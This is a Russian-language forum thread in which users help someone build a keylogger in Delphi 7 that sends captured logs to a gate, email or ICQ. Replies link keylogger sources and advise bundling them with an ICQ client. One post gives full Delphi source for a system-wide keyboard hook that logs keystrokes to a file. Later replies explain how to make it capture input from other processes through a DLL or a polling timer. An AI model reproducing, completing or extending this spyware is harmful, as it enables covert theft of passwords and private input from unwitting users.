кейлоГГер на delphi7
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
кейлоГГер на delphi7 - 2008-12-31 22:45:02.883333
|
|
|
treemout
Сообщений: 17
Оценки: 0
Присоединился: 2008-12-30 18:31:38.580000
|
мне нужно сделать кейлоггер и чтобы отсылал логи на гейт или мыло,аську!
если у кого есть исходник кейлоггера или готовый кейлогкоторый отсылал бы логи прошу выложить в теме!
заранее благодарен :)
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-01 00:41:08.410000
|
|
|
VENOM4X
Сообщений: 246
Оценки: 0
Присоединился: 2008-02-18 22:49:08.960000
|
Вот тебе примеры простых кейлоггеров из книги Зайцева «ROOTKITS, SPYWARE/ADWARE, KEYLOGGERS & BACKDOORS: обнаружение и защита» (3 на Delphi, 2 на Си): http://slil.ru/26499987
Плюс возьми TICQClient здесь http://progs.volkov.spb.su/ticqclient/ (думаю, что с асей тебе будет легче разобратся чем с гейтом)
Скрути всё вместе и будет тебе счастье ;-)
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-01 02:12:48.873333
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
VENOM4X, где всю книжку можно взять? ;)
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-01 03:05:00.716666
|
|
|
VENOM4X
Сообщений: 246
Оценки: 0
Присоединился: 2008-02-18 22:49:08.960000
|
Например здесь http://up.fastfile.ru/2071483
P.S. В архиме среди прочих примеров есть и реальный руткит, который палится антивирями, поэтому может будет на архив ругатся.
P.P.S. Книга скорее относится к анализу угроз и методам защиты. Автор книги - создатель AVZ.
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-01 14:31:00.906666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
думаю с асей будет хуже с ее сменами протокола…. лучше отсылка по почте - работает отлично!
а вот кейлог
http://www.delphisources.ru/pages/sources/system/2005_year/key_logger.html
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-01 15:36:05.123333
|
|
|
treemout
Сообщений: 17
Оценки: 0
Присоединился: 2008-12-30 18:31:38.580000
|
VENOM4X,Unconnected,VaZoNeZ спасиба вам, с наступившим…
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-01 21:20:18.506666
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Сам заинтересовался этой темой, вот толковая статья тоже..
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-01 21:55:37.310000
|
|
|
treemout
Сообщений: 17
Оценки: 0
Присоединился: 2008-12-30 18:31:38.580000
|
quote:
Сам заинтересовался этой темой, вот толковая статья тоже..
спс хорошая статья
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-05 04:08:00.663333
|
|
|
RUNETCHICK
Сообщений: 9
Оценки: 0
Присоединился: 2008-12-12 16:05:13.866666
|
Люди, почему не работает кейлоггер:unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs;
type
TForm1 = class(TForm)
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
SaveExitProc: Pointer;
HKey: hHook=0;
f: Text;
implementation
{$R *.dfm}
function Key_HookKey(code: integer; wParam: integer; lParam: integer): integer stdcall;
begin
if (code>=0) and (lParam and $40000000 = 0) then
begin
assign(f, 'C:\1.txt');
if fileexists('C:\1.txt') then append(f) else rewrite(f);
writeln(f, chr(wParam));
close(f)
end;
Result:=CallNextHookEx(HKey, Code, wParam, lParam)
end;
procedure StartKey;
begin
HKey:=SetWindowsHookEx(WH_KEYBOARD, @Key_HookKey, hInstance, 0)
end;
procedure RemoveHookKey;
begin
if HKey<>0 then
begin
UnhookWindowsHookEx(HKey);
HKey:=0
end
end;
procedure RemoveAllHooks;
begin
RemoveHookKey;
ExitProc:=SaveExitProc
end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
RemoveAllHooks
end;
begin
SaveExitProc:=ExitProc;
ExitProc:=@RemoveAllHooks;
StartKey
end.
Вообще он работает, но только на половину. Например, если окно моего приложения активно - то работает. Как только окно потеряет фокус и если нажать любую клавишу, то программа не работает. Даже если потом опять сделать окно своего приложения активным.
Я вот вроде программу понимаю, только не пойму для чего тут ExitProc, SaveExitProc. Всмысле с какой целью их тут используют. И нужны ли они вообще?
И второе, что мне не понятно: почему все так советуют писать кейлоггер именно в dll'ке, почему нельзя в обычной программе, как, например, тут?
Вообще этот код он изначально был в библиотеке, но я решил сделать все в одной программе. Теперь ничего не работает. Помогите довести дело до конца, чтобы все работало и без всяких dll, если такое возможно. Если нет, то объясните, почему без dll'ок обойтись нельзя?
Заранее спасибо! 
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-05 12:26:16.773333
|
|
|
Stil Free
Сообщений: 598
Оценки: 0
Присоединился: 2008-11-02 16:07:14.136666
|
VaZoNeZ огромное спасибо:)))))))))
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-05 12:39:01.530000
|
|
|
spikky
Сообщений: 211
Оценки: 0
Присоединился: 2008-10-26 14:50:23.676666
|
quote:
Если нет, то объясните, почему без dll'ок обойтись нельзя?
24 урок от Iczelion'a:
quote:
Локальные хуки пеpехватывают события, котоpые случаются в пpоцессе, созданном вам. Удаленные хуки пеpехватывают события, котоpые случаются в дpугих пpоцессах.[/ul]… Вы должны понимать, как pаботают хуки, чтобы использовать их эффективно. Когда вы создадаете хук, Windows создает в памяти стpуктуpы данных, котоpая содеpжит инфоpмацию о хуке, и добавляет ее в связанный список уже существующих хуков. Hовый хук добавляется пеpед всеми стаpыми хуками. Когда случается событие, то если вы установили локальный хук, вызывается фильтpующая функция в вашем пpоцессе, поэтому тут все пpосто. Hо если вы установили удаленный хук, система должна вставить код хук-пpоцедуpы в адpесное пpостpанство дpугого пpоцесса. Система может сделать это только, если функция находится в DLL. Таким обpазом, если вы хотите испольовать удаленный хук, ваша хук-пpоцедуpа должна находиться в DLL.
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-05 12:52:04.456666
|
|
|
treemout
Сообщений: 17
Оценки: 0
Присоединился: 2008-12-30 18:31:38.580000
|
RUNETCHICK, скачай исходник здесь http://www.delphisources.ru/pages/sources/system/2005_year/key_logger.html
|
|
|
|
|
RE: кейлоГГер на delphi7 - 2009-01-06 12:43:57.250000
|
|
|
Format_C
Сообщений: 97
Оценки: 0
Присоединился: 2008-07-09 13:14:54.146666
|
RUNETCHICK попробуй засунуть код программы в таймер с интервалом равным около 200…
это очень некорректно, но для простого кейлогера подойдет, я так, помнится, давно делал.
есть правда небольшое "но": если пользователь печатает быстро, то шпион будет плохо работать, но если медленно или с нормальной скоростью, то все будет норм. изменяй интервал
|
|
|
|
|
|
